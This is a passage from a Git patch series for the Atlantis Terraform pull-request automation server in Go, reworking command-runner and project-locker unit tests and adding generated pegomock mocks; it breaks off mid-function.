+func TestRunCommentCommand_ForkPREnabled(t *testing.T) {
 	t.Log("when running a plan on a fork PR, it should succeed")
 	setup(t)
 

From cf3e654733adee986686dfff276ad3e0f05a8829 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Thu, 21 Jun 2018 22:59:02 +0100
Subject: [PATCH 44/69] Start on tests

---
 server/events/command_runner_test.go          | 130 +++----
 server/events/project_command_builder_test.go |  28 ++
 server/events/project_command_runner.go       |   2 +-
 server/events/project_locker_test.go          | 366 ++++++------------
 .../events/yaml/mocks/matchers/valid_spec.go  |  20 +
 .../yaml/mocks/mock_parser_validator.go       |  80 ++++
 server/events/yaml/raw/step.go                |   2 +
 server/server.go                              |   9 +-
 8 files changed, 314 insertions(+), 323 deletions(-)
 create mode 100644 server/events/yaml/mocks/matchers/valid_spec.go
 create mode 100644 server/events/yaml/mocks/mock_parser_validator.go

diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go
index dcb2c77fde..ff60cf2752 100644
--- a/server/events/command_runner_test.go
+++ b/server/events/command_runner_test.go
@@ -117,7 +117,7 @@ func TestRunCommentCommand_GithubPullParseErr(t *testing.T) {
 	setup(t)
 	var pull github.PullRequest
 	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
-	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err"))
+	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, fixtures.GitlabRepo, errors.New("err"))
 
 	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
 	Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String())
@@ -135,7 +135,7 @@ func TestRunCommentCommand_ForkPRDisabled(t *testing.T) {
 	headRepo := fixtures.GithubRepo
 	headRepo.FullName = "forkrepo/atlantis"
 	headRepo.Owner = "forkrepo"
-	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil)
+	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, modelPull.BaseRepo, headRepo, nil)
 
 	ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, nil)
 	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. To enable, set --"+ch.AllowForkPRsFlag)
@@ -150,71 +150,71 @@ func TestRunCommentCommand_ClosedPull(t *testing.T) {
 	}
 	modelPull := models.PullRequest{State: models.Closed}
 	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
-	When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil)
+	When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, modelPull.BaseRepo, fixtures.GithubRepo, nil)
 
 	ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil)
 	vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests")
 }
 
-func TestRunCommentCommand_FullRun(t *testing.T) {
-	t.Log("when running a plan, apply should comment")
-	pull := &github.PullRequest{
-		State: github.String("closed"),
-	}
-	cmdResult := events.CommandResult{}
-	for _, c := range []events.CommandName{events.Plan, events.Apply} {
-		setup(t)
-		cmd := events.CommentCommand{
-			Name:      c,
-			Workspace: "workspace",
-		}
-		When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
-		When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
-		When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
-		switch c {
-		case events.Plan:
-			When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult)
-		case events.Apply:
-			When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult)
-		}
-
-		ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
-
-		ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
-		_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
-		Equals(t, cmdResult, response)
-		vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
-		workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
-	}
-}
-
-func TestRunCommentCommand_ForkPREnabled(t *testing.T) {
-	t.Log("when running a plan on a fork PR, it should succeed")
-	setup(t)
-
-	// Enable forked PRs.
-	ch.AllowForkPRs = true
-	defer func() { ch.AllowForkPRs = false }() // Reset after test.
-
-	var pull github.PullRequest
-	cmdResponse := events.CommandResult{}
-	cmd := events.CommentCommand{
-		Name:      events.Plan,
-		Workspace: "workspace",
-	}
-	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
-	headRepo := fixtures.GithubRepo
-	headRepo.FullName = "forkrepo/atlantis"
-	headRepo.Owner = "forkrepo"
-	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil)
-	When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
-	When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
-
-	ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd)
-
-	ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
-	_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
-	Equals(t, cmdResponse, response)
-	vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
-	workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
-}
+//func TestRunCommentCommand_FullRun(t *testing.T) {
+//	t.Log("when running a plan, apply should comment")
+//	pull := &github.PullRequest{
+//		State: github.String("closed"),
+//	}
+//	cmdResult := events.CommandResult{}
+//	for _, c := range []events.CommandName{events.Plan, events.Apply} {
+//		setup(t)
+//		cmd := events.CommentCommand{
+//			Name:      c,
+//			Workspace: "workspace",
+//		}
+//		When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil)
+//		When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil)
+//		When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
+//		switch c {
+//		case events.Plan:
+//			When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult)
+//		case events.Apply:
+//			When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult)
+//		}
+//
+//		ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd)
+//
+//		ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
+//		_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
+//		Equals(t, cmdResult, response)
+//		vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
+//		workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
+//	}
+//}
+
+//func TestRunCommentCommand_ForkPREnabled(t *testing.T) {
+//	t.Log("when running a plan on a fork PR, it should succeed")
+//	setup(t)
+//
+//	// Enable forked PRs.
+//	ch.AllowForkPRs = true
+//	defer func() { ch.AllowForkPRs = false }() // Reset after test.
+//
+//	var pull github.PullRequest
+//	cmdResponse := events.CommandResult{}
+//	cmd := events.CommentCommand{
+//		Name:      events.Plan,
+//		Workspace: "workspace",
+//	}
+//	When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil)
+//	headRepo := fixtures.GithubRepo
+//	headRepo.FullName = "forkrepo/atlantis"
+//	headRepo.Owner = "forkrepo"
+//	When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil)
+//	When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true)
+//	When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse)
+//
+//	ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd)
+//
+//	ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd)
+//	_, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments()
+//	Equals(t, cmdResponse, response)
+//	vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString())
+//	workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)
+//}
diff --git a/server/events/project_command_builder_test.go b/server/events/project_command_builder_test.go
index 79457f0dd2..b8fb20c1ca 100644
--- a/server/events/project_command_builder_test.go
+++ b/server/events/project_command_builder_test.go
@@ -1 +1,29 @@
 package events_test
+
+//. "github.com/runatlantis/atlantis/testing"
+
+//func TestBuildAutoplanCommands(t *testing.T) {
+//	tmpDir, cleanup := TempDir(t)
+//	defer cleanup()
+//
+//	workspace := mocks.NewMockAtlantisWorkspace()
+//	vcsClient := vcsmocks.NewMockClientProxy()
+//
+//	builder := &events.DefaultProjectCommandBuilder{
+//		AtlantisWorkspaceLocker: events.NewDefaultAtlantisWorkspaceLocker(),
+//		Workspace:               workspace,
+//		ParserValidator:         &yaml.ParserValidator{},
+//		VCSClient:               vcsClient,
+//		ProjectFinder:           &events.DefaultProjectFinder{},
+//	}
+//
+//	// If autoplan is false, should return empty steps.
+//	ctxs, err := builder.BuildAutoplanCommands(&events.CommandContext{
+//		BaseRepo: models.Repo{},
+//		HeadRepo: models.Repo{},
+//		Pull:     models.PullRequest{},
+//		User:     models.User{},
+//		Log:      nil,
+//	})
+//	Ok(t, err)
+//}
diff --git a/server/events/project_command_runner.go b/server/events/project_command_runner.go
index 45117c3a06..513a32fc1c 100644
--- a/server/events/project_command_runner.go
+++ b/server/events/project_command_runner.go
@@ -153,7 +153,7 @@ func (p *ProjectCommandRunner) Apply(ctx models.ProjectCommandContext) ProjectCo
 		for _, req := range ctx.ProjectConfig.ApplyRequirements {
 			switch req {
 			case "approved":
-				approved, err := p.PullApprovedChecker.PullIsApproved(ctx.BaseRepo, ctx.Pull)
+				approved, err := p.PullApprovedChecker.PullIsApproved(ctx.BaseRepo, ctx.Pull) // nolint: vetshadow
 				if err != nil {
 					return ProjectCommandResult{Error: errors.Wrap(err, "checking if pull request was approved")}
 				}
diff --git a/server/events/project_locker_test.go b/server/events/project_locker_test.go
index cd6c80d91a..232e144f50 100644
--- a/server/events/project_locker_test.go
+++ b/server/events/project_locker_test.go
@@ -13,257 +13,117 @@
 //
 package events_test
 
-//import (
-//	. "github.com/petergtz/pegomock"
-//	. "github.com/runatlantis/atlantis/testing"
-//)
+import (
+	"testing"
 
-//var ctx = events.CommandContext{
-//	Command: &events.Command{
-//		Name: events.Plan,
-//	},
-//	Log: logging.NewNoopLogger(),
-//}
-//var project = models.Project{}
-//
-//func TestExecute_LockErr(t *testing.T) {
-//	t.Log("when there is an error returned from TryLock we return it")
-//	p, l, _, _ := setupPreExecuteTest(t)
-//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{}, errors.New("err"))
-//
-//	res := p.Execute(&ctx, "", project)
-//	Equals(t, "acquiring lock: err", res.ProjectResult.Error.Error())
-//}
-//
-//func TestExecute_LockFailed(t *testing.T) {
-//	t.Log("when we can't acquire a lock for this project and the lock is owned by a different pull, we get an error")
-//	p, l, _, _ := setupPreExecuteTest(t)
-//	// The response has LockAcquired: false and the pull request is a number
-//	// different than the current pull.
-//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
-//		LockAcquired: false,
-//		CurrLock:     models.ProjectLock{Pull: models.PullRequest{Num: ctx.Pull.Num + 1}},
-//	}, nil)
-//
-//	res := p.Execute(&ctx, "", project)
-//	Equals(t, "This project is currently locked by #1. The locking plan must be applied or discarded before future plans can execute.", res.ProjectResult.Failure)
-//}
-//
-//func TestExecute_ConfigErr(t *testing.T) {
-//	t.Log("when there is an error loading config, we return it")
-//	p, l, _, _ := setupPreExecuteTest(t)
-//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
-//		LockAcquired: true,
-//	}, nil)
-//	When(p.ParserValidator.Exists("")).ThenReturn(true)
-//	When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, errors.New("err"))
-//
-//	res := p.Execute(&ctx, "", project)
-//	Equals(t, "err", res.ProjectResult.Error.Error())
-//}
-//
-//func TestExecute_PreInitErr(t *testing.T) {
-//	t.Log("when the project is on tf >= 0.9 and we run a `pre_init` that returns an error we return it")
-//	p, l, tm, r := setupPreExecuteTest(t)
-//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
-//		LockAcquired: true,
-//	}, nil)
-//	When(p.ParserValidator.Exists("")).ThenReturn(true)
-//	When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{
-//		PreInit: []string{"pre-init"},
-//	}, nil)
-//	tfVersion, _ := version.NewVersion("0.9.0")
-//	When(tm.Version()).ThenReturn(tfVersion)
-//	When(r.Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")).ThenReturn("", errors.New("err"))
-//
-//	res := p.Execute(&ctx, "", project)
-//	Equals(t, "running pre_init commands: err", res.ProjectResult.Error.Error())
-//}
-//
-//func TestExecute_InitErr(t *testing.T) {
-//	t.Log("when the project is on tf >= 0.9 and we run `init` that returns an error we return it")
-//	p, l, tm, _ := setupPreExecuteTest(t)
-//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
-//		LockAcquired: true,
-//	}, nil)
-//	When(p.ParserValidator.Exists("")).ThenReturn(true)
-//	When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, nil)
-//	tfVersion, _ := version.NewVersion("0.9.0")
-//	When(tm.Version()).ThenReturn(tfVersion)
-//	When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, errors.New("err"))
-//
-//	res := p.Execute(&ctx, "", project)
-//	Equals(t, "err", res.ProjectResult.Error.Error())
-//}
-//
-//func TestExecute_PreGetErr(t *testing.T) {
-//	t.Log("when the project is on tf < 0.9 and we run a `pre_get` that returns an error we return it")
-//	p, l, tm, r := setupPreExecuteTest(t)
-//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
-//		LockAcquired: true,
-//	}, nil)
-//	When(p.ParserValidator.Exists("")).ThenReturn(true)
-//	When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{
-//		PreGet: []string{"pre-get"},
-//	}, nil)
-//	tfVersion, _ := version.NewVersion("0.8")
-//	When(tm.Version()).ThenReturn(tfVersion)
-//	When(r.Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")).ThenReturn("", errors.New("err"))
-//
-//	res := p.Execute(&ctx, "", project)
-//	Equals(t, "running pre_get commands: err", res.ProjectResult.Error.Error())
-//}
-//
-//func TestExecute_GetErr(t *testing.T) {
-//	t.Log("when the project is on tf < 0.9 and we run `get` that returns an error we return it")
-//	p, l, tm, _ := setupPreExecuteTest(t)
-//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
-//		LockAcquired: true,
-//	}, nil)
-//	When(p.ParserValidator.Exists("")).ThenReturn(true)
-//	When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{}, nil)
-//	tfVersion, _ := version.NewVersion("0.8")
-//	When(tm.Version()).ThenReturn(tfVersion)
-//	When(tm.RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")).ThenReturn("", errors.New("err"))
-//
-//	res := p.Execute(&ctx, "", project)
-//	Equals(t, "err", res.ProjectResult.Error.Error())
-//}
-//
-//func TestExecute_PreCommandErr(t *testing.T) {
-//	t.Log("when we get an error running pre commands we return it")
-//	p, l, tm, r := setupPreExecuteTest(t)
-//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(locking.TryLockResponse{
-//		LockAcquired: true,
-//	}, nil)
-//	When(p.ParserValidator.Exists("")).ThenReturn(true)
-//	When(p.ParserValidator.Read("")).ThenReturn(events.ProjectConfig{
-//		PrePlan: []string{"command"},
-//	}, nil)
-//	tfVersion, _ := version.NewVersion("0.9")
-//	When(tm.Version()).ThenReturn(tfVersion)
-//	When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil)
-//	When(r.Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")).ThenReturn("", errors.New("err"))
-//
-//	res := p.Execute(&ctx, "", project)
-//	Equals(t, "running pre_plan commands: err", res.ProjectResult.Error.Error())
-//}
-//
-//func TestExecute_SuccessTF9(t *testing.T) {
-//	t.Log("when the project is on tf >= 0.9 it should be successful")
-//	p, l, tm, r := setupPreExecuteTest(t)
-//	lockResponse := locking.TryLockResponse{
-//		LockAcquired: true,
-//	}
-//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
-//	When(p.ParserValidator.Exists("")).ThenReturn(true)
-//	config := events.ProjectConfig{
-//		PreInit: []string{"pre-init"},
-//	}
-//	When(p.ParserValidator.Read("")).ThenReturn(config, nil)
-//	tfVersion, _ := version.NewVersion("0.9")
-//	When(tm.Version()).ThenReturn(tfVersion)
-//	When(tm.Init(ctx.Log, "", "", nil, tfVersion)).ThenReturn(nil, nil)
-//
-//	res := p.Execute(&ctx, "", project)
-//	Equals(t, events.TryLockResponse{
-//		ProjectConfig:    config,
-//		TerraformVersion: tfVersion,
-//		LockResponse:     lockResponse,
-//	}, res)
-//	tm.VerifyWasCalledOnce().Init(ctx.Log, "", "", nil, tfVersion)
-//	r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-init"}, "", "", tfVersion, "pre_init")
-//}
-//
-//func TestExecute_SuccessTF8(t *testing.T) {
-//	t.Log("when the project is on tf < 0.9 it should be successful")
-//	p, l, tm, r := setupPreExecuteTest(t)
-//	lockResponse := locking.TryLockResponse{
-//		LockAcquired: true,
-//	}
-//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
-//	When(p.ParserValidator.Exists("")).ThenReturn(true)
-//	config := events.ProjectConfig{
-//		PreGet: []string{"pre-get"},
-//	}
-//	When(p.ParserValidator.Read("")).ThenReturn(config, nil)
-//	tfVersion, _ := version.NewVersion("0.8")
-//	When(tm.Version()).ThenReturn(tfVersion)
-//
-//	res := p.Execute(&ctx, "", project)
-//	Equals(t, events.TryLockResponse{
-//		ProjectConfig:    config,
-//		TerraformVersion: tfVersion,
-//		LockResponse:     lockResponse,
-//	}, res)
-//	tm.VerifyWasCalledOnce().RunCommandWithVersion(ctx.Log, "", []string{"get", "-no-color"}, tfVersion, "")
-//	r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"pre-get"}, "", "", tfVersion, "pre_get")
-//}
-//
-//func TestExecute_SuccessPrePlan(t *testing.T) {
-//	t.Log("when there are pre_plan commands they are run")
-//	p, l, tm, r := setupPreExecuteTest(t)
-//	lockResponse := locking.TryLockResponse{
-//		LockAcquired: true,
-//	}
-//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
-//	When(p.ParserValidator.Exists("")).ThenReturn(true)
-//	config := events.ProjectConfig{
-//		PrePlan: []string{"command"},
-//	}
-//	When(p.ParserValidator.Read("")).ThenReturn(config, nil)
-//	tfVersion, _ := version.NewVersion("0.9")
-//	When(tm.Version()).ThenReturn(tfVersion)
-//
-//	res := p.Execute(&ctx, "", project)
-//	Equals(t, events.TryLockResponse{
-//		ProjectConfig:    config,
-//		TerraformVersion: tfVersion,
-//		LockResponse:     lockResponse,
-//	}, res)
-//	r.VerifyWasCalledOnce().Execute(ctx.Log, []string{"command"}, "", "", tfVersion, "pre_plan")
-//}
-//
-//func TestExecute_SuccessPreApply(t *testing.T) {
-//	t.Log("when there are pre_apply commands they are run")
-//	p, l, tm, r := setupPreExecuteTest(t)
-//	lockResponse := locking.TryLockResponse{
-//		LockAcquired: true,
-//	}
-//	When(l.TryLock(project, "", ctx.Pull, ctx.User)).ThenReturn(lockResponse, nil)
-//	When(p.ParserValidator.Exists("")).ThenReturn(true)
-//	config := events.ProjectConfig{
-//		PreApply: []string{"command"},
-//	}
-//	When(p.ParserValidator.Read("")).ThenReturn(config, nil)
-//	tfVersion, _ := version.NewVersion("0.9")
-//	When(tm.Version()).ThenReturn(tfVersion)
-//
-//	cpCtx := deepcopy.Copy(ctx).(events.CommandContext)
-//	cpCtx.Command = &events.Command{
-//		Name: events.Apply,
-//	}
-//	cpCtx.Log = logging.NewNoopLogger()
-//
-//	res := p.Execute(&cpCtx, "", project)
-//	Equals(t, events.TryLockResponse{
-//		ProjectConfig:    config,
-//		TerraformVersion: tfVersion,
-//		LockResponse:     lockResponse,
-//	}, res)
-//	r.VerifyWasCalledOnce().Execute(cpCtx.Log, []string{"command"}, "", "", tfVersion, "pre_apply")
-//}
-//
-//func setupPreExecuteTest(t *testing.T) (*events.DefaultProjectLocker, *lmocks.MockLocker, *tmocks.MockClient, *rmocks.MockRunner) {
-//	RegisterMockTestingT(t)
-//	l := lmocks.NewMockLocker()
-//	cr := mocks.NewMockProjectConfigReader()
-//	tm := tmocks.NewMockClient()
-//	r := rmocks.NewMockRunner()
-//	return &events.DefaultProjectLocker{
-//		Locker:       l,
-//		ParserValidator: cr,
-//		Terraform:    tm,
-//		Run:          r,
-//	}, l, tm, r
-//}
+	. "github.com/petergtz/pegomock"
+	"github.com/runatlantis/atlantis/server/events"
+	"github.com/runatlantis/atlantis/server/events/locking"
+	"github.com/runatlantis/atlantis/server/events/locking/mocks"
+	"github.com/runatlantis/atlantis/server/events/models"
+	"github.com/runatlantis/atlantis/server/logging"
+	. "github.com/runatlantis/atlantis/testing"
+)
+
+func TestDefaultProjectLocker_TryLockWhenLocked(t *testing.T) {
+	mockLocker := mocks.NewMockLocker()
+	locker := events.DefaultProjectLocker{
+		Locker: mockLocker,
+	}
+	expProject := models.Project{}
+	expWorkspace := "default"
+	expPull := models.PullRequest{}
+	expUser := models.User{}
+
+	lockingPull := models.PullRequest{
+		Num: 2,
+	}
+	When(mockLocker.TryLock(expProject, expWorkspace, expPull, expUser)).ThenReturn(
+		locking.TryLockResponse{
+			LockAcquired: false,
+			CurrLock: models.ProjectLock{
+				Pull: lockingPull,
+			},
+			LockKey: "",
+		},
+		nil,
+	)
+	res, err := locker.TryLock(logging.NewNoopLogger(), expPull, expUser, expWorkspace, expProject)
+	Ok(t, err)
+	Equals(t, &events.TryLockResponse{
+		LockAcquired:      false,
+		LockFailureReason: "This project is currently locked by #2. The locking plan must be applied or discarded before future plans can execute.",
+	}, res)
+}
+
+func TestDefaultProjectLocker_TryLockWhenLockedSamePull(t *testing.T) {
+	RegisterMockTestingT(t)
+	mockLocker := mocks.NewMockLocker()
+	locker := events.DefaultProjectLocker{
+		Locker: mockLocker,
+	}
+	expProject := models.Project{}
+	expWorkspace := "default"
+	expPull := models.PullRequest{Num: 2}
+	expUser := models.User{}
+
+	lockingPull := models.PullRequest{
+		Num: 2,
+	}
+	lockKey := "key"
+	When(mockLocker.TryLock(expProject, expWorkspace, expPull, expUser)).ThenReturn(
+		locking.TryLockResponse{
+			LockAcquired: false,
+			CurrLock: models.ProjectLock{
+				Pull: lockingPull,
+			},
+			LockKey: lockKey,
+		},
+		nil,
+	)
+	res, err := locker.TryLock(logging.NewNoopLogger(), expPull, expUser, expWorkspace, expProject)
+	Ok(t, err)
+	Equals(t, true, res.LockAcquired)
+
+	// UnlockFn should work.
+	mockLocker.VerifyWasCalled(Never()).Unlock(lockKey)
+	err = res.UnlockFn()
+	Ok(t, err)
+	mockLocker.VerifyWasCalledOnce().Unlock(lockKey)
+}
+
+func TestDefaultProjectLocker_TryLockUnlocked(t *testing.T) {
+	RegisterMockTestingT(t)
+	mockLocker := mocks.NewMockLocker()
+	locker := events.DefaultProjectLocker{
+		Locker: mockLocker,
+	}
+	expProject := models.Project{}
+	expWorkspace := "default"
+	expPull := models.PullRequest{Num: 2}
+	expUser := models.User{}
+
+	lockingPull := models.PullRequest{
+		Num: 2,
+	}
+	lockKey := "key"
+	When(mockLocker.TryLock(expProject, expWorkspace, expPull, expUser)).ThenReturn(
+		locking.TryLockResponse{
+			LockAcquired: true,
+			CurrLock: models.ProjectLock{
+				Pull: lockingPull,
+			},
+			LockKey: lockKey,
+		},
+		nil,
+	)
+	res, err := locker.TryLock(logging.NewNoopLogger(), expPull, expUser, expWorkspace, expProject)
+	Ok(t, err)
+	Equals(t, true, res.LockAcquired)
+
+	// UnlockFn should work.
+	mockLocker.VerifyWasCalled(Never()).Unlock(lockKey)
+	err = res.UnlockFn()
+	Ok(t, err)
+	mockLocker.VerifyWasCalledOnce().Unlock(lockKey)
+}
diff --git a/server/events/yaml/mocks/matchers/valid_spec.go b/server/events/yaml/mocks/matchers/valid_spec.go
new file mode 100644
index 0000000000..6aba4616e6
--- /dev/null
+++ b/server/events/yaml/mocks/matchers/valid_spec.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+	"reflect"
+
+	"github.com/petergtz/pegomock"
+	valid "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+func AnyValidSpec() valid.Spec {
+	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(valid.Spec))(nil)).Elem()))
+	var nullValue valid.Spec
+	return nullValue
+}
+
+func EqValidSpec(value valid.Spec) valid.Spec {
+	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+	var nullValue valid.Spec
+	return nullValue
+}
diff --git a/server/events/yaml/mocks/mock_parser_validator.go b/server/events/yaml/mocks/mock_parser_validator.go
new file mode 100644
index 0000000000..f66c58778a
--- /dev/null
+++ b/server/events/yaml/mocks/mock_parser_validator.go
@@ -0,0 +1,80 @@
+// Automatically generated by pegomock. DO NOT EDIT!
+// Source: github.com/runatlantis/atlantis/server/events/yaml (interfaces: ParserValidator)
+
+package mocks
+
+import (
+	"reflect"
+
+	pegomock "github.com/petergtz/pegomock"
+	valid "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+type MockParserValidator struct {
+	fail func(message string, callerSkip ...int)
+}
+
+func NewMockParserValidator() *MockParserValidator {
+	return &MockParserValidator{fail: pegomock.GlobalFailHandler}
+}
+
+func (mock *MockParserValidator) ReadConfig(repoDir string) (valid.Spec, error) {
+	params := []pegomock.Param{repoDir}
+	result := pegomock.GetGenericMockFrom(mock).Invoke("ReadConfig", params, []reflect.Type{reflect.TypeOf((*valid.Spec)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()})
+	var ret0 valid.Spec
+	var ret1 error
+	if len(result) != 0 {
+		if result[0] != nil {
+			ret0 = result[0].(valid.Spec)
+		}
+		if result[1] != nil {
+			ret1 = result[1].(error)
+		}
+	}
+	return ret0, ret1
+}
+
+func (mock *MockParserValidator) VerifyWasCalledOnce() *VerifierParserValidator {
+	return &VerifierParserValidator{mock, pegomock.Times(1), nil}
+}
+
+func (mock *MockParserValidator) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierParserValidator {
+	return &VerifierParserValidator{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockParserValidator) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierParserValidator {
+	return &VerifierParserValidator{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierParserValidator struct {
+	mock                   *MockParserValidator
+	invocationCountMatcher pegomock.Matcher
+	inOrderContext         *pegomock.InOrderContext
+}
+
+func (verifier *VerifierParserValidator) ReadConfig(repoDir string) *ParserValidator_ReadConfig_OngoingVerification {
+	params := []pegomock.Param{repoDir}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ReadConfig", params)
